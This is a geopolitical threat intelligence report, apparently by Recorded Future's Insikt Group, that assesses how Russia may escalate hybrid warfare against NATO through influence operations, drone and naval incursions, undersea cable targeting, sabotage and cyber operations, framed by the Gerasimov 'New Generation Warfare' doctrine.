        <p>In a full-scale NGW campaign in NATO territory, Russia would likely move from its current pattern of influence operations efforts combined with largely opportunistic cyber and sabotage targeting to a Europe-wide campaign that is more intentionally planned and aims to project Russian power and weaken European defenses on a systemic level. An NGW campaign would very likely involve Russia using the same tactics it is currently using, including sabotage operations, influence operations, territorial waters and airspace violations, and exploitation of some NATO states’ dependence on Russian oil and gas. The primary differences between Russia’s current operations in Europe and an NGW campaign would include greater geographic breadth of those operations; greater frequency of operations; and Russia likely using tactics simultaneously and in coordinated ways. For example, likely Russia-directed threat actors might use a drone to violate the airspace over a NATO state’s airport, forcing the temporary closure of that airport, coupled with a distributed denial-of-service attack on the airport’s internal communications system. Russia might then post a video of the incidents through one of its overt or covert propaganda outlets, arguing that they show NATO cannot adequately protect its aviation network.</p>
        <p>An NGW campaign in NATO territory would very likely have significant implications for private and public sector entities, including degradation of critical infrastructure, reputational risk for individuals and companies named in Russian influence operation campaigns, and reduced public confidence in the government’s ability to ensure their safety.</p>
        <p>Over the next three to five years, Putin will likely evaluate the feasibility of moving from an NGW-like campaign in Europe to a kinetic military incursion. Factors Putin would likely weigh when making such a decision include NATO military capabilities, the likelihood that the US would defend a NATO state if it were attacked, and Russian military capabilities. However, even if the necessary conditions for such an operation emerge, the probability of a proactive Russian military operation into NATO territory very likely remains low.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Russia’s hybrid warfare campaign in NATO territory between February 2022 and January 2026 has been increasingly aggressive, but likely opportunistic and not reflective of Russia’s full cyber, influence operations, and sabotage capabilities.</li>
          <li>Putin likely views the next two years as an opportunity to test NATO’s defensive capabilities and prepare the physical and psychological environment, should he decide to launch a military incursion. Putin likely assesses that the 2028 US presidential election could lead to a US president more willing to commit US resources to NATO. As such, Putin likely views the next two years as an opportunity to exploit existing US-NATO tensions to weaken NATO’s unity and ability to defend itself.</li>
          <li>Russia’s escalated aggression against NATO over the next two years is likely to have the hallmarks of a Russian military doctrine called New Generation Warfare (NGW), which combines sabotage operations, cyberattacks, influence operations, and other non-military actions to undermine the enemy’s confidence and prepare the physical and psychological environment, should Russia elect to escalate into a kinetic military campaign.</li>
          <li>A full-scale NGW campaign would likely involve an intensified campaign of tactics Russia has used against NATO in the last few years, including sabotage operations, influence operations, violations of NATO airspace with drones and jets, violations of NATO states’ territorial waters, targeting of undersea cables, and exploitation of some NATO states’ dependence on Russian gas and oil. Russia would likely deploy these tactics more frequently, across more states simultaneously, and would likely use tactics simultaneously in an attempt to strain NATO resources.</li>
          <li>A full-scale NGW campaign would have significant implications for private and public sector entities operating in NATO territory, including disruption to critical services, reputational risk for individuals and firms named in influence campaigns, supply chain disruptions, and reduced public trust in the government’s ability to safeguard critical infrastructure. The fact that most of the critical infrastructure in NATO territory is privately owned means public-private partnerships will be essential in mitigating the impact of escalated Russian aggression.</li>
        </ul>
        <h2>Russia Likely to Escalate into New Generation Warfare Campaign in Europe Over Next Two Years</h2>
        <p>Since Russia’s full-scale invasion of Ukraine in February 2022, it has waged what Insikt Group assesses is largely opportunistic, though increasingly aggressive, hybrid warfare in Europe. These actions, though destructive, have very likely not leveraged Russia’s full capability to integrate cyber, political, and sabotage tools into a full-scale campaign.</p>
        <p>Nonetheless, Russian president Vladimir Putin very likely still prioritizes weakening European unity and defensive capabilities in service to his overarching foreign policy goal of <a href="https://mid.ru/en/foreign_policy/fundamental_documents/1860586/">replacing</a> the US-led international system with a multipolar world in which Russia, the US, and China are relatively equal in terms of geopolitical influence. Putin very likely judges that <a href="https://www.whitehouse.gov/wp-content/uploads/2025/12/2025-National-Security-Strategy.pdf">uneven</a> US assistance to European defensive efforts creates a window of opportunity for Russia to weaken Europe’s ability to resist Russian aggression. Putin likely views recent US-NATO tensions, such as the US’s articulated <a href="https://time.com/7354005/trump-davos-speech-greenland/">intention</a> to control Greenland, as an opportunity to exacerbate the strategic distance between the US and NATO, thereby weakening the transatlantic partnership that has formed the core of the US-led, post-World War II security architecture. Putin also likely views the next two years as an opportunity to optimize the physical and informational environment in Europe, should he decide to launch a kinetic military attack against Europe.</p>
        <p>Putin very likely views this window of opportunity as finite. He likely recognizes that the 2028 US presidential election could result in a US president more willing to commit US military and political resources to amplifying Europe’s defensive capabilities. As such, over the next two years, Putin will likely escalate Russia’s hybrid warfare against Europe into an expanded campaign that is likely consistent with the principles of Russian New Generation Warfare (NGW) –– a warfare doctrine <a href="https://www.armyupress.army.mil/portals/7/military-review/archives/english/militaryreview_20160228_art008.pdf">espoused</a> by senior Russian military officials emphasizing control of the information and psychological spaces, as well as the use of undeclared special forces, to weaken an enemy prior to using traditional military forces.</p>
        <p>Europe’s efforts to bolster its defenses against current levels of Russian hybrid warfare likely reinforce Putin’s perception that Europe is motivated to weaken Russia, thereby likely making him more motivated to target Europe. Putin’s perception that Europe’s defensive efforts are actually a threat to Russia is likely rooted in his calculus that NATO is fundamentally an anti-Russia bloc. Putin has substantiated this assessment by pointing to actions such as NATO’s expansion to include former Warsaw Pact countries and its decision to install missile defense systems in Poland.<sup>1</sup></p>
        <h2>New Generation Warfare Origins and Principles</h2>
        <p>Insikt Group assesses that much of Russia’s aggressive foreign policy actions since the annexation of Crimea in March 2014 –– which marked the beginning of Putin’s more assertive efforts to push back against perceived Western efforts to weaken Russia –– have been consistent with NGW, a Russian doctrine in which the state aims to bring about political change in another country primarily by using overt and covert influence tools, as opposed to conventional military force. These tools can include influence operations, sabotage operations, and exploiting economic leverage.</p>
        <p>New Generation Warfare is typically associated with Chief of the General Staff Valery Gerasimov’s 2013 <a href="https://www.armyupress.army.mil/portals/7/military-review/archives/english/militaryreview_20160228_art008.pdf">article</a> in the Russian journal <em>Military-Industrial Kurier</em>, though NGW is essentially a modern version of Soviet active measures. “Active measures” (<em>aktivnye meropriyatiya</em>) was a term <a href="https://www.marshallcenter.org/en/publications/security-insights/active-measures-russias-covert-geopolitical-operations-0">used</a> by the Soviet Union from the 1950s onwards to describe covert influence and subversion operations, including establishing front organizations, backing pro-Soviet political movements abroad, and attempting to orchestrate regime change in foreign countries. Active measures declined during the 1980s and 1990s, but Putin revived its use in the early 2000s. Indeed, in 2007, retired major-general Alexander Vladimirov alluded to that revival when he stated that “modern wars are waged on the level of consciousness and ideas” and that “modern humanity exists in a state of permanent war” in which it is “eternally oscillating between phases of actual armed struggle and constant preparation for it.”<sup>2</sup></p>
        <p>Despite the long history of Russia using active measures, Gerasimov’s 2013 article provides the most comprehensive account of how current Russian military leaders likely view this doctrine. Gerasimov’s article suggests that he views NGW both as the reality of modern warfare and as a preferred way of weakening enemies. Gerasimov argued that the Arab Spring demonstrated that modern wars are not declared conflicts between traditional militaries, but instead depend more on a combination of declared military force and tactics such as domination of the information space, targeting of critical enemy facilities, “asymmetric and indirect operations,” and the use of unofficial special forces. He argued that “the very ‘rules of war’ have changed. The role of nonmilitary means of achieving political and strategic goals has grown and, in many cases, they have exceeded the power of force of weapons in their effectiveness.”</p>
        <p>The following table, taken from a translation of the article, shows Gerasimov’s view of traditional warfare as opposed to New Generation Warfare:</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a2e8f66cd46382f09a2845436e016ce2d9e46822.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="852" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>New Generation Warfare and traditional warfare forms and methods (Source:</em> <em><a href="https://www.armyupress.army.mil/portals/7/military-review/archives/english/militaryreview_20160228_art008.pdf">Military Review</a>)</em></div>
          </div>
        </div>
        <p>We assess that Russia’s campaign in Ukraine, starting with the annexation of Crimea in March 2014 and extending to its ongoing full-scale military operation, bears many of the hallmarks of NGW. Russia’s military operations more closely aligned with NGW principles from 2014 through 2021; after Russia’s full-scale invasion of Ukraine in February 2022, the Russian military transitioned to more traditional operations. Russia’s exploitation of influence operations and asymmetric warfare has been a feature of its operations since 2014, and since 2022, Russia has <a href="https://www.iiss.org/research-paper/2025/08/the-scale-of-russian--sabotage-operations--against-europes-critical--infrastructure/">expanded</a> asymmetric and sabotage operations in Europe likely as part of a multi-faceted strategy to use power exertion in Ukraine and Europe to weaken the Western geopolitical system.</p>
        <p>This does not mean that Russian military leadership have consciously used NGW as their guiding principle in Ukraine at all times; indeed, we lack the insight into Russian military leadership thinking to assess with high confidence the principles they are employing. Rather, the combination of Gerasimov’s writings and observation of Russian operations in Ukraine means we can assess with medium confidence that Russia’s Ukraine operations prior to 2022 often reflected NGW principles. As such, we assess that NGW is a useful framework for understanding Russian military operations.</p>
        <div>
          <div>
            <div><strong>NGW Principle</strong></div>
            <div><strong>Example of How the Ukraine Operation Exemplifies Principle</strong></div>
          </div>
          <div>
            <div>Initiation of military operations by groupings of line units in peacetime</div>
            <div><strong>March 2014–February 2022:</strong> Russian regular line units (Russian Airborne Forces [VDV], Naval Infantry, and Main Intelligence Directorate [GRU]-controlled <a href="https://www.osce.org/sites/default/files/f/documents/d/1/220141.pdf">unit</a> formations) entered Ukrainian territory, <a href="https://digitallibrary.un.org/record/767883">annexed</a> Crimea, and <a href="https://www.osce.org/sites/default/files/f/documents/5/d/196991.pdf">operated</a> in eastern Ukraine without a declared state of war. In eastern Ukraine, troops operated under attempted deniability, with Moscow claiming the operations were being <a href="https://www.osce.org/sites/default/files/f/documents/1/f/146341.pdf">conducted</a> by sympathetic Ukrainian separatist forces.<br /><br /><strong>February 2022–January 2026:</strong> Though Russia acknowledged its presence throughout Ukraine, it still operates<sup>3</sup> without a full declaration of war, instead casting its campaign as a “special military operation.”</div>
          </div>
          <div>
            <div>Highly maneuverable, noncontact combat operations of interbranch groupings of line units</div>
            <div><strong>March 2014–February 2022:</strong> Russian battalion tactical groups (BTGs) generally <a href="https://www.rusi.org/explore-our-research/publications/commentary/getting-know-russian-battalion-tactical-group">demonstrated</a> high operational mobility, integrating ground forces, artillery, electronic warfare, and intelligence, surveillance, and reconnaissance (ISR) assets.<br /><br /><strong>February 2022–January 2026:</strong> As Russia has attempted to take more territory, it has <a href="https://www.rusi.org/explore-our-research/publications/commentary/attritional-art-war-lessons-russian-war-ukraine">transitioned</a> to a greater emphasis on attritional, contact-heavy warfare.</div>
          </div>
          <div>
            <div>Reduction of the military-economic potential of the enemy state via the destruction of critically important military and civilian infrastructure</div>
            <div><strong>March 2014–January 2026:</strong> Russia has consistently <a href="https://ukraine.ohchr.org/en/Increasing-attacks-on-Ukraine-s-energy-infrastructure-place-civilians-at-risk-UN-human-rights-monitors-warn">attempted</a> to degrade Ukraine’s critical infrastructure, including through long-range strikes and cyberattacks <a href="https://www.cisa.gov/news-events/ics-alerts/ir-alert-h-16-056-01">targeting</a> power plants, transportation and logistics hubs, and defense-industrial facilities.</div>
          </div>
          <div>
            <div>Mass use of precision weaponry, special operations forces, and robotics systems</div>
            <div><strong>March 2014–January 2026:</strong> Russia has increasingly <a href="https://en.defence-ua.com">used</a> precision weapons (for example, Iskander-M ballistic missiles, Kalibr cruise missiles, Kh-101/555 air-launched cruise missiles), GRU special operations <a href="https://www.osce.org/sites/default/files/f/documents/d/1/220141.pdf">units</a> (including the 3rd Separate Spetsnaz Brigade and the 346th Independent Spetsnaz Brigade); and <a href="https://www.dia.mil/Portals/110/Documents/News/Military_Power_Publications/UAV_Book.pdf">unmanned</a> systems (such as Orlan-10, Lancet, Shahid-136 drones, and ground robots for logistics and mine-clearing operations).</div>
          </div>
          <div>
            <div>Simultaneous effects on line-units and enemy facilities throughout the enemy state’s territory</div>
            <div><strong>March 2014–January 2026:</strong> Russia has <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a">conducted</a> strikes across Ukraine, using frontline units, operational rear units, missile and ground attacks, and cyber operations.</div>
          </div>
          <div>
            <div>Warfare simultaneously in physical and information space</div>
            <div><strong>March 2014–January 2026:</strong> Russia has consistently used covert and overt means to <a href="https://stratcomcoe.org/publications/analysis-of-russias-information-campaign-against-ukraine/151">propagate</a> narratives meant to justify intervention and regime change in Ukraine. These include <a href="https://www.euvsdisinfo.eu/report/ukraine-promotes-nazism-because-it-oppresses-russians/">allegations</a> of Nazism in the Ukrainian military and government writ large; discrimination against Russians in Ukraine; and Western government efforts to foment revolution in Ukraine.</div>
          </div>
          <div>
            <div>Use of asymmetric and indirect operations</div>
            <div>
              <p><strong>March 2014–February 2022:</strong> Russia’s operations were indirect because they <a href="https://www.congress.gov/crs_external_products/IF/PDF/IF12344/IF12344.3.pdf">included</a> non-acknowledged units, private military companies, and proxy forces such as Donetsk People’s Republic (DPR) and Luhansk People’s Republic (LPR) militias.</p>
              <p><strong>February 2022–January 2026:</strong> Russia escalated its use of asymmetric and indirect operations against Europe, including <a href="https://www.gov.uk/government/news/joint-expeditionary-force-activates-uk-led-reaction-system-to-track-threats-to-undersea-infrastructure-and-monitor-russian-shadow-fleet">targeting</a> undersea cables and critical infrastructure, likely to pressure Europe and Kyiv to abandon efforts to resist Russia’s Ukraine campaign.</p>
            </div>
          </div>
          <div>
            <div>Command and control of forces and assets in a unified information space</div>
            <div><strong>March 2014–January 2026:</strong> Russia has attempted to <a href="https://www.usmcu.edu/Outreach/Marine-Corps-University-Press/MCU-Journal/JAMS-vol-14-no-2/Russias-War-in-Ukraine/">integrate</a> its C2 structures, including shared ISR, targeting data, and operational planning, across services, and has centralized strike coordination for long-range fires.<br /><br />However, limitations have been <a href="https://www.congress.gov/crs_external_products/R/PDF/R47068/R47068.1.pdf">apparent</a> in Russia’s ability to accomplish this, especially since February 2022, likely stemming from deficiencies such as poor inter-service coordination, rigid command structures, and underestimation of Ukrainian capabilities and willingness to fight.</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>New Generation Warfare principles (Source: Recorded Future)</em></p>
        <h2>New Generation Warfare Toolkit</h2>
        <p>In a full-scale New Generation Warfare campaign in Europe, Russia would likely move from its current pattern of influence operations efforts combined with largely opportunistic cyber and sabotage targeting to a Europe-wide campaign that is both proactive and reactive. It would likely involve the same tactics Russia has used against NATO states for the past few years. The difference would likely be that Russia would deploy these tactics more frequently and across a greater number of states at once. A full NGW campaign would likely also involve using some operational methods simultaneously and in ways that amplify one another.</p>
        <p>Even in a full-scale NGW campaign, Russia would very likely aim to keep destruction below the threshold that risks NATO invoking Article 5. NATO officials have not specified precisely what the Article 5 threshold is; indeed, former NATO Secretary General Jens Stoltenberg <a href="https://ccdcoe.org/library/publications/cyber-attacks-and-article-5-a-note-on-a-blurry-but-consistent-position-of-nato/">stated</a> that the grounds for invoking Article 5 “must remain purposefully vague.” However, it is likely that it would include a mass casualty event or the use of a chemical or biological weapon. The text of Article 5 <a href="https://www.nato.int/en/what-we-do/introduction-to-nato/collective-defence-and-article-5">specifies</a> that the threshold involves “an armed attack.” NATO officials <a href="https://ccdcoe.org/library/publications/cyber-attacks-and-article-5-a-note-on-a-blurry-but-consistent-position-of-nato/">said</a> in 2022 that a cyberattack could constitute grounds for invoking Article 5, though they did not specify what kind of cyberattack would qualify.</p>
        <p>Russia is likely to face few downsides during an NGW campaign, due to minimal risk of Russian casualties and the campaign’s tactical flexibility. Unlike a conventional military campaign, which risks a high level of casualties that can cause domestic public dissatisfaction, an NGW campaign very likely would involve minimal risk to Russian citizens. In addition, an NGW campaign inherently offers significant tactical flexibility, as it is not a declared campaign in which Russia needs to articulate goals to justify the campaign to the Russian public and elites. As such, Putin would likely have the option to draw down tactics that are proving less effective and increase the use of more effective tactics, without needing to justify tactical failures. This flexibility would likely allow Putin to continue at least aspects of an NGW campaign in the likely event that Europe responds to an NGW campaign with escalated efforts to counter Moscow.</p>
        <h3>Influence Operations and Propaganda</h3>
        <p>Russian “active measures” serve as a force multiplier for Moscow’s broader political warfare, integrating influence operations, propaganda, and sabotage. In Europe, these efforts aim to weaken transatlantic cohesion, erode public and political support for Ukrainian sovereignty and assistance to Kyiv, and exacerbate internal societal divisions, economic uncertainty, and other challenges. By cultivating sanctions fatigue and encouraging selective bilateral re-engagement with Russia through active measures, Moscow seeks to mitigate its international isolation and <a href="https://www.cnas.org/publications/commentary/russia-wants-a-new-world-order">undermine</a> the rules-based international order, thereby advancing a Russia-favored multipolar system <a href="https://www.csis.org/blogs/post-soviet-post/four-myths-about-russian-grand-strategy">characterized</a> by exclusive spheres of influence. Notably, these activities also include angles of domestic preservation by portraying the West as chaotic, corrupt, and immoral, and thereby discouraging the expansion of liberal democracies elsewhere, particularly from within.</p>
        <p>Since Russia’s full-scale invasion of Ukraine in 2022, Insikt Group has observed concentrated Russian influence operations targeting the domestic audiences of what Moscow likely views as Kyiv’s core European supporters: the UK, France, Germany, and Poland. Insikt Group investigations, in addition to public reporting, have previously identified multiple influence operations targeting the above-mentioned major European allies, including Doppelgänger, Operation Overload, Operation Undercut, and CopyCop. These influence operations have commonly impersonated national and pan-European media outlets to disseminate messages aligned with Kremlin propaganda, including anti-Ukraine themes and content that denigrates pro-European political figures. Elsewhere, Russian influence operations have sought to use fear and physical demonstrations to manipulate public opinion. In France, for example, Russia-linked physical intimidation very likely intended to provoke public anxiety and societal unrest <a href="https://www.bbc.com/news/world-europe-67360768">included</a> the Star of David and red hand graffiti, as well as the <a href="https://www.lemonde.fr/en/pixels/article/2024/06/03/coffins-at-the-eiffel-tower-suspicions-point-to-another-case-of-russian-interference_6673608_13.html">placement</a> of caskets near the Eiffel Tower ahead of the 2024 Paris Olympic Games. Similar efforts have also appeared elsewhere in Europe, including the <a href="https://edition.cnn.com/2024/09/13/europe/pro-russian-posters-italy-intl-scli">emergence</a> of pro-Russian billboards in Italy and the "Children of War, Alley of Angels" <a href="https://eaworldview.com/2025/02/ukraine-war-europe-facing-trump-russia/">exhibit</a> in Germany.</p>
        <p>Russian influence efforts have also leveraged illicit financing and alleged bribery to attempt to favorably reshape European politics. For example, in spring 2024, Czech authorities <a href="https://www.politico.eu/article/czech-republic-russia-influence-voice-of-europe/">attributed</a> the Voice of Europe, an organization linked to Viktor Medvedchuk, to paying politicians in several EU countries to spread anti-Ukraine messages. In September and October 2024, Moldovan police <a href="https://www.reuters.com/world/europe/moldova-says-russia-linked-network-tried-buy-votes-2024-10-04/">reported</a> that a Russia-linked network, allegedly run by fugitive oligarch Ilan Shor, channeled tens of millions of dollars to buy votes ahead of Moldova’s October 20, 2024, presidential election and EU referendum. In December 2024, Romanian prosecutors <a href="https://www.reuters.com/world/europe/romania-probes-alleged-russian-linked-campaign-financing-tiktok-2024-12-06/">conducted</a> raids and opened probes into alleged illegal campaign financing and payments to TikTok users and influencers associated with the then-annulled presidential vote. More recently, former UK Member of the European Parliament (MEP) Nathan Gill was <a href="https://www.reuters.com/world/uk/former-uk-mep-jailed-accepting-bribes-linked-russia-2025-11-21/">sentenced</a> on November 21, 2025, after pleading guilty for accepting bribes to make pro-Russian statements.</p>
        <p>Insikt Group assesses Russia’s NGW against Europe will likely consist of aggressive influence operations targeting Europe that aim to erode European unity and advance Russia’s quest for a multipolar world order. NGW will very likely continue supporting Moscow’s core objectives of eroding political and public support for Ukrainian sovereignty and assistance to Kyiv, accelerate sanctions fatigue, and exploit domestic political crises and election cycles to fracture European cohesiveness and transatlantic cooperation. Moscow will likely expand its reliance on access to third parties and intermediaries, including sympathetic socio-political organizations and fringe movements, to launder Kremlin-aligned messages into the European information environment.</p>
        <p>Across Europe, Russia will almost certainly continue to attempt to delegitimize existing democratic institutions and Europe’s information ecosystem by continuing to foster distrust in elections, mainstream media, the EU, and pro-European government figures. In a post-war environment, assuming European sanctions on Russian media enterprises are lifted, Russia will very likely attempt to reestablish its state media presence while also hardening itself to withstand future disruptions, legal restrictions, and platform or government takedowns in the event of a kinetic conflict with Europe.</p>
        <p>New Generation Warfare operations against Europe will very likely incorporate much of Russia’s current-era influence tradecraft, including social media influence via human and automated networks, media impersonation and covert media outlet brands, illicit financing and bribery, and cyber-enabled influence such as hack-and-leak narratives. Further, Insikt Group assesses Moscow will very likely continue attempting to cultivate sympathetic allies through covertly funded fringe socio-political organizations, using these entities to astroturf “grassroots” support, amplify Kremlin-aligned narratives, and catalyze or intensify domestic unrest across Europe. We assess that Russia will also adapt emerging technologies, particularly AI, to scale the production, localization, and quality of influence content, increase dissemination efficiency, and optimize targeting. Continued advances in generative AI will almost certainly improve the realism of propaganda images and fabricated reporting, forged documents and correspondence, and synthetic impersonations of public figures, including audio and video deepfakes.</p>
        <h3>Airspace Incursions by Drones and Jets</h3>
        <p>Beginning in September 2025, suspected violations of NATO airspace by Russia-directed drone operators or Russian jets increased to unprecedented levels, as Russia likely sought to project power across NATO territory and test NATO resolve while maintaining plausible deniability. Insikt Group tracked 30 suspected or confirmed violations between September 2025 and January 2026, compared to 23 suspected or confirmed violations between March 2022 and August 2025. The most commonly targeted countries since March 2022 have been Poland and Romania; however, suspected Russian violations of NATO airspace have occurred outside of Russia’s historic sphere of influence, including in Germany, UK, Denmark and Norway. Violations have most frequently targeted critical infrastructure, such as military bases and airports.</p>
        <p>In a full-scale New Generation Warfare-like campaign in Europe, Russia likely would escalate the frequency and level of aggressiveness of these violations. Russia’s targeting would likely continue to focus on critical infrastructure, but violations would very likely significantly increase in frequency. Russia would also likely use drones to fly closer to targets and perhaps hover over them for extended periods of time, in a likely effort to test NATO’s willingness to shoot down drones and perhaps collect intelligence on critical infrastructure facilities. Indeed, in September 2025, Polish authorities said they <a href="https://www.bbc.com/news/articles/c147065pzdzo">shot</a> down Russian drones that violated Poland’s airspace.</p>
        <p>Other ways Russia would likely escalate the aggressiveness of its airspace violations include timing those violations with major NATO events, such as military exercises and summits. Russia could escalate its use of drones as electronic warfare mechanisms, perhaps to disrupt NATO military exercises or the functioning of critical infrastructure facilities.</p>
        <p>Russia would likely also use its drones to amplify its psychological warfare as a way of projecting power and demonstrating to the public that Moscow can disrupt everyday life in NATO countries. Russia could do this via tactics such as hovering drones over civilian transportation infrastructure, like railways or airports, which have already been <a href="https://www.cbsnews.com/news/drones-europe-nato-airports-russia-hybrid-warfare-belgium-uk-anti-drone-troops/">forced</a> to temporarily close. Russia could also launch drones over facilities hosting political summits, such as the annual NATO Summit, or over polling places during elections to stoke public fear. In a full-scale NGW campaign that involves coordination of multiple tactics, Russian propaganda outlets might release footage of these incidents to propagate a narrative that NATO states cannot protect their infrastructure. Russia could also combine drone or jet violations with sabotage operations to further sow public panic and force NATO governments into a defensive posture.</p>
        <p>Russia would very likely seek to maintain some level of deniability and would avoid airstrikes and mass casualty events, which would almost certainly guarantee an Article 5 declaration.</p>
        <h3>Territorial Waters Violations and Targeting of Undersea Cables</h3>
        <p>Insikt Group assesses that, since February 2022, Russia has increasingly used violations of NATO states’ territorial waters<sup>4</sup> and targeting of undersea cables to test the alliance’s resilience, collect intelligence, keep NATO in a reactive, defensive posture, and attempt to deter NATO from undermining Russian strategic interests. In June 2023, Deputy Chairman of the Security Council Dmitriy Medvedev <a href="https://www.reuters.com/world/europe/russias-medvedev-says-moscow-now-has-free-hand-destroy-enemies-undersea-2023-06-14/">stated</a> that, “if we proceed from the proven complicity of Western countries in blowing up the Nord Streams, then we have no constraints — even moral — left to prevent us from destroying the ocean-floor cable communications of our enemies.” Medvedev’s comments were likely purposefully hyperbolic; however, they likely reflect a Kremlin perception that NATO is targeting Russian strategic interests, thereby justifying retaliatory action.</p>
        <p>Examples of Russia likely targeting undersea cables and maritime assets include an April 2025 incident in which the UK <a href="https://www.thetimes.com/uk/defence/article/russia-secret-war-uk-waters-submarines-dpbzphfx5">identified</a> Russian sensors attempting to collect intelligence on UK nuclear submarines and other underwater critical infrastructure; the Russian Yantar surveillance ship <a href="https://www.theguardian.com/world/2024/nov/16/russian-spy-ship-escorted-away-from-internet-cables-in-irish-sea">sailing</a> near cables carrying data for Google and Microsoft under the Irish Sea in November 2024; and reports suggesting that the Russian Eagle S ship accused of damaging multiple undersea cables in December 2024 <a href="https://www.lloydslist.com/LL1151955/Russia-linked-cable-cutting-tanker-seized-by-Finland-was-loaded-with-spying-equipment">carried</a> spy equipment to monitor naval activity.</p>
        <p>Russian ships have also violated NATO states’ territorial waters, likely to test NATO resilience, force NATO into a defensive posture, and project power. Examples include a July 2025 incident in which a Russian border guard vessel <a href="https://news.err.ee/1609755954/russian-border-guard-vessel-violates-estonia-s-maritime-border">entered</a> Estonian territorial waters without permission; a July 2024 incident in which a Russian naval vessel <a href="https://www.rferl.org/a/finland-russia-vessel-border-guard-territorial-waters/33052301.html?utm_source=chatgpt.com">entered</a> Finnish territorial waters without authorization; and frequent <a href="https://apnews.com/article/nato-russia-shadow-fleet-jets-ukraine-sanctions-oil-revenue-5e74109e5b1d84dc73ac2592068d4689">encounters</a> between NATO states and Russia-linked “shadow fleet” vessels. These vessels are tankers sailing under other flags, which often refuse inspection or orders from local navies.</p>
        <p>During a full-scale New Generation Warfare campaign against NATO, Russia likely would escalate its targeting of undersea cables and violations of territorial waters. This could include more frequent cable targeting, likely to cause minor but persistent damage to undersea critical infrastructure that tests NATO resilience and Russian destructive capabilities without provoking an Article 5 declaration. Russia could also conduct electronic jamming operations during cable repairs to inhibit communications and use Russian ships to harass those conducting repairs.</p>
        <p>Russia would also likely attempt longer and more provocative territorial waters violations, including placing Russian ships near NATO vessels and expanding these activities into areas such as the Mediterranean; conducting concurrent hybrid activity such as GPS jamming and automatic identification system (AIS) spoofing; refusing escort out of territorial waters; and combining territorial waters violations with airspace violations by Russian aircraft or targeting of undersea infrastructure.</p>
        <p>Russia would likely aim to overwhelm NATO’s existing efforts to prevent sabotage of undersea infrastructure. In January 2025, Allied Joint Force Command Brunssum (JFCBS) <a href="https://shape.nato.int/operations/operations-and-missions/baltic-sentry">launched</a> Baltic Sentry — a campaign that uses tools such as frigates, maritime patrol assets, and naval drones to deter sabotage of undersea infrastructure. Since the launch of Baltic Sentry, the Baltic Sea has <a href="https://www.atlanticcouncil.org/in-depth-research-reports/issue-brief/how-the-baltic-sea-nations-have-tackled-suspicious-cable-cuts/">experienced</a> very few undersea sabotage efforts; however, it is not clear whether this is the result of Baltic Sentry or a lack of planned operations.</p>
        <h3>Sabotage Operations</h3>
        <p>We assess Russia has escalated its use of sabotage operations in NATO territory since its full-scale invasion of Ukraine in 2022, likely to test the resilience particularly of NATO states’ critical infrastructure; propagate a narrative that Western states cannot protect their populations from threats; harm NATO’s ability to collectively respond to Russian aggression by forcing NATO into a reactive, defensive posture; and degrade NATO states’ ability to provide material support to Ukraine. Sabotage operations are loosely defined, but typically <a href="https://www.rferl.org/a/parcels-exploded-russian-plot/33189080.html">consist</a> of targeting <a href="https://apnews.com/article/lithuania-russia-intelligence-arson-attack-ikea-vilnius-b7f915c6376c0711b852657d17a30c0d">civilian</a> or dual-use <a href="https://foreignpolicy.com/2024/07/26/russia-sabotage-poison-finland-water-treatment/">infrastructure</a> with physical security attacks by deniable entities.</p>
        <p>Particularly since 2022, Russia-linked entities have focused sabotage operations on critical infrastructure in NATO states, exploiting vulnerabilities wrought from <a href="https://www.fme.nl/system/files/publicaties/2023-12/rapport%20infra%20maintenance%20EU%20%2B%20intro.pdf">deferred</a> maintenance and lack of sufficient public or private <a href="https://www.visualcapitalist.com/sp/charted-europes-2-trillion-infrastructure-investment-deficit-gxeu01/">investment</a> in upkeep. Within critical infrastructure, the most frequently <a href="https://www.iiss.org/research-paper/2025/08/the-scale-of-russian--sabotage-operations--against-europes-critical--infrastructure/">targeted</a> sectors include undersea telecommunication and power cables; water supply and distribution; transportation; military; healthcare; and telecommunications. The number of Russian sabotage operations has quadrupled from 2023 to 2024, and in 2025, it was likely at levels consistent with 2024. Operations have occurred across NATO, as opposed to being focused in Russia’s historic sphere of influence. That said, the most commonly <a href="https://www.iiss.org/research-paper/2025/08/the-scale-of-russian--sabotage-operations--against-europes-critical--infrastructure/">targeted</a> states between January 2018 and June 2025 were Germany, Estonia, Latvia, Lithuania, and Poland.</p>
        <p>In a New Generation Warfare-like campaign targeting NATO territory, Moscow would likely move from what we assess has thus far been largely opportunistic sabotage to operations with more consistency and geographic breadth, and that complement other tactics.</p>
        <p>Russia would likely still focus its sabotage operations on critical infrastructure, but would likely place a premium on damaging the critical infrastructure of NATO states that either would be probable targets of a Russian military incursion — such as Poland or the Baltic states — or would lend significant assistance to those states, such as the UK, Germany, or France. This is because in an NGW campaign, Russia would likely view sabotage operations as, in part, a way to test the resilience of potential victim states and their allies. Russia’s sabotage operations against those targets would likely be more frequent and could coincide with significant events such as elections or military exercises. Russia would likely pair sabotage operations with other tactics, such as offensive cyber operations or airspace violations, to augment the destructive impact of the operations and try to strain NATO states’ capacity by forcing them to respond to multiple disruptions at once, while still staying below the threshold that would risk an Article 5 declaration.</p>
        <h3>Offensive Cyber Operations for Disruption and Counterintelligence</h3>
        <p>Russian cyber activity directed at European targets has consistently emphasized access-oriented operations, including attacks on internet-facing firewalls, virtual private networks (VPNs), email services, and web portals. This activity aligns with documented Russian cyber practices focused on enabling intelligence collection, operational reach, and long-term flexibility rather than immediate disruptive effects. Recent Insikt Group reporting highlights BlueEcho activity targeting perimeter infrastructure to establish footholds and enable follow-on credential capture and lateral movement, while BlueDelta campaigns demonstrate sustained credential harvesting at scale using impersonated Microsoft Outlook Web App (OWA), Sophos VPN, and Google login workflows. This tradecraft is low-cost, repeatable, and consistent with long-term counterintelligence targeting of government, defense, and research entities.</p>
